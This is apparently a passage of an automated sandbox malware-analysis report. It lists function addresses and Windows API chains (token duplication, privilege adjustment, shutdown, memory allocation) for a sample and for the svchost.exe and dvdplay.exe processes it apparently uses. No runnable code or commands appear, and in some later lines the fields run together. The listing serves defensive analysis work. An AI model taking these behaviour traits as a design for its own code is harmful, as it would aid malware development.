            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_00B493D0 NtClose | 3_2_00B493D0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_00B49330 NtDeleteFile | 3_2_00B49330
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_00B49540 NtAllocateVirtualMemory | 3_2_00B49540
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle | 0_2_00431BE8
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_00446313
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState | 0_2_004333BE
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_004096A0 | 0_2_004096A0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0042200C | 0_2_0042200C
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0041A217 | 0_2_0041A217
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00412216 | 0_2_00412216
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0042435D | 0_2_0042435D
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_004033C0 | 0_2_004033C0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0044F430 | 0_2_0044F430
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_004125E8 | 0_2_004125E8
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0044663B | 0_2_0044663B
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00413801 | 0_2_00413801
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0042096F | 0_2_0042096F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_004129D0 | 0_2_004129D0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_004119E3 | 0_2_004119E3
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0041C9AE | 0_2_0041C9AE
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0047EA6F | 0_2_0047EA6F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0040FA10 | 0_2_0040FA10
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0044EB59 | 0_2_0044EB59
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00423C81 | 0_2_00423C81
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00411E78 | 0_2_00411E78
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00442E0C | 0_2_00442E0C
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00420EC0 | 0_2_00420EC0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0044CF17 | 0_2_0044CF17
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00444FD2 | 0_2_00444FD2
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_02E73620 | 0_2_02E73620
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418643 | 1_2_00418643
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416810 | 1_2_00416810
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416813 | 1_2_00416813
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00410083 | 1_2_00410083
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004028A0 | 1_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E103 | 1_2_0040E103
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403110 | 1_2_00403110
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402540 | 1_2_00402540
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042EDF3 | 1_2_0042EDF3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FE63 | 1_2_0040FE63
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FA352 | 1_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0344E3F0 | 1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035003E6 | 1_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E0274 | 1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034C02C0 | 1_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034C8158 | 1_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03430100 | 1_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034DA118 | 1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F81CC | 1_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F41A2 | 1_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035001AA | 1_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034D2000 | 1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03464750 | 1_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03440770 | 1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0343C7C0 | 1_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345C6E0 | 1_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03440535 | 1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03500591 | 1_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F2446 | 1_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E4420 | 1_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034EE4F6 | 1_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FAB40 | 1_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F6BD7 | 1_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0343EA80 | 1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03456962 | 1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034429A0 | 1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0350A9A6 | 1_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0344A840 | 1_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03442840 | 1_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0346E8F0 | 1_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034268B8 | 1_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B4F40 | 1_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03482F28 | 1_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03460F30 | 1_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E2F30 | 1_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03432FC8 | 1_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034BEFA0 | 1_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03440E59 | 1_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FEE26 | 1_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FEEDB | 1_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03452E90 | 1_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FCE93 | 1_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0344AD00 | 1_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034DCD1F | 1_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0343ADE0 | 1_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03458DBF | 1_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03440C00 | 1_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03430CF2 | 1_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E0CB5 | 1_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0342D34C | 1_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F132D | 1_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0348739A | 1_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345B2C0 | 1_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E12ED | 1_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345D2F0 | 1_2_0345D2F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034452A0 | 1_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0347516C | 1_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0342F172 | 1_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0350B16B | 1_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0344B1B0 | 1_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034EF0CC | 1_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034470C0 | 1_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F70E9 | 1_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FF0E0 | 1_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FF7B0 | 1_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03485630 | 1_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F16CC | 1_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F7571 | 1_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035095C3 | 1_2_035095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034DD5B0 | 1_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03431460 | 1_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FF43F | 1_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FFB76 | 1_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B5BF0 | 1_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0347DBF9 | 1_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345FB80 | 1_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FFA49 | 1_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F7A46 | 1_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B3A6C | 1_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034EDAC6 | 1_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034DDAAC | 1_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03485AA0 | 1_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E1AA3 | 1_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03449950 | 1_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345B950 | 1_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034D5910 | 1_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034AD800 | 1_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034438E0 | 1_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FFF09 | 1_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03403FD2 | 1_2_03403FD2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03403FD5 | 1_2_03403FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03441F92 | 1_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FFFB1 | 1_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03449EB0 | 1_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03443D40 | 1_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F1D5A | 1_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034F7D73 | 1_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345FDC0 | 1_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B9C32 | 1_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FFCF2 | 1_2_034FFCF2
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Code function: 2_2_0329402D | 2_2_0329402D
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Code function: 2_2_0329600C | 2_2_0329600C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Code function: 2_2_03294051 | 2_2_03294051
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Code function: 2_2_0329408C | 2_2_0329408C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Code function: 2_2_0329C799 | 2_2_0329C799
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Code function: 2_2_0329C79C | 2_2_0329C79C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Code function: 2_2_0328A51C | 2_2_0328A51C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Code function: 2_2_032B4D7C | 2_2_032B4D7C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Code function: 2_2_03295DEC | 2_2_03295DEC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Code function: 2_2_0329E5C0 | 2_2_0329E5C0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_0365A352 | 3_2_0365A352
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_036603E6 | 3_2_036603E6
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035AE3F0 | 3_2_035AE3F0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_03640274 | 3_2_03640274
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_036202C0 | 3_2_036202C0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_03628158 | 3_2_03628158
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_03590100 | 3_2_03590100
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_0363A118 | 3_2_0363A118
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_036581CC | 3_2_036581CC
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_036541A2 | 3_2_036541A2
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_036601AA | 3_2_036601AA
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_03632000 | 3_2_03632000
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035C4750 | 3_2_035C4750
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035A0770 | 3_2_035A0770
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_0359C7C0 | 3_2_0359C7C0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035BC6E0 | 3_2_035BC6E0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035A0535 | 3_2_035A0535
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_03660591 | 3_2_03660591
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036524463_2_03652446
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036444203_2_03644420
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0364E4F63_2_0364E4F6
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365AB403_2_0365AB40
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03656BD73_2_03656BD7
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0359EA803_2_0359EA80
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035B69623_2_035B6962
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0366A9A63_2_0366A9A6
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A29A03_2_035A29A0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A28403_2_035A2840
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035AA8403_2_035AA840
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035CE8F03_2_035CE8F0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035868B83_2_035868B8
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03614F403_2_03614F40
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03642F303_2_03642F30
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035C0F303_2_035C0F30
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035E2F283_2_035E2F28
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03592FC83_2_03592FC8
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0361EFA03_2_0361EFA0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A0E593_2_035A0E59
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365EE263_2_0365EE26
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365EEDB3_2_0365EEDB
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035B2E903_2_035B2E90
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365CE933_2_0365CE93
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035AAD003_2_035AAD00
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0363CD1F3_2_0363CD1F
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0359ADE03_2_0359ADE0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035B8DBF3_2_035B8DBF
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A0C003_2_035A0C00
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03590CF23_2_03590CF2
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03640CB53_2_03640CB5
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0358D34C3_2_0358D34C
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365132D3_2_0365132D
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035E739A3_2_035E739A
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036412ED3_2_036412ED
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035BB2C03_2_035BB2C0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035BD2F03_2_035BD2F0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A52A03_2_035A52A0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0366B16B3_2_0366B16B
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0358F1723_2_0358F172
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D516C3_2_035D516C
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035AB1B03_2_035AB1B0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365F0E03_2_0365F0E0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036570E93_2_036570E9
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A70C03_2_035A70C0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0364F0CC3_2_0364F0CC
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365F7B03_2_0365F7B0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035E56303_2_035E5630
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036516CC3_2_036516CC
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036575713_2_03657571
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036695C33_2_036695C3
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0363D5B03_2_0363D5B0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035914603_2_03591460
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365F43F3_2_0365F43F
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365FB763_2_0365FB76
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03615BF03_2_03615BF0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035DDBF93_2_035DDBF9
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035BFB803_2_035BFB80
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03613A6C3_2_03613A6C
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03657A463_2_03657A46
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365FA493_2_0365FA49
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0364DAC63_2_0364DAC6
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03641AA33_2_03641AA3
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0363DAAC3_2_0363DAAC
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035E5AA03_2_035E5AA0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A99503_2_035A9950
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035BB9503_2_035BB950
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036359103_2_03635910
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0360D8003_2_0360D800
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A38E03_2_035A38E0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365FF093_2_0365FF09
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03563FD53_2_03563FD5
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03563FD23_2_03563FD2
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A1F923_2_035A1F92
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365FFB13_2_0365FFB1
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A9EB03_2_035A9EB0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03657D733_2_03657D73
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A3D403_2_035A3D40
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03651D5A3_2_03651D5A
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035BFDC03_2_035BFDC0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03619C323_2_03619C32
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365FCF23_2_0365FCF2
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B31BF03_2_00B31BF0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B2CAE03_2_00B2CAE0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B2AD803_2_00B2AD80
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B2CD003_2_00B2CD00
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B352C03_2_00B352C0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B334903_2_00B33490
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B3348D3_2_00B3348D
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B4BA703_2_00B4BA70
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_033BE3383_2_033BE338
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_033BE7ED3_2_033BE7ED
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_033BE4543_2_033BE454
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_033BD8583_2_033BD858
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: String function: 0360EA12 appears 86 times
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: String function: 0358B970 appears 262 times
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: String function: 035D5130 appears 58 times
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: String function: 0361F290 appears 103 times
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: String function: 035E7E54 appears 107 times
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: String function: 00445AE0 appears 65 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0342B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03487E54 appears 107 times
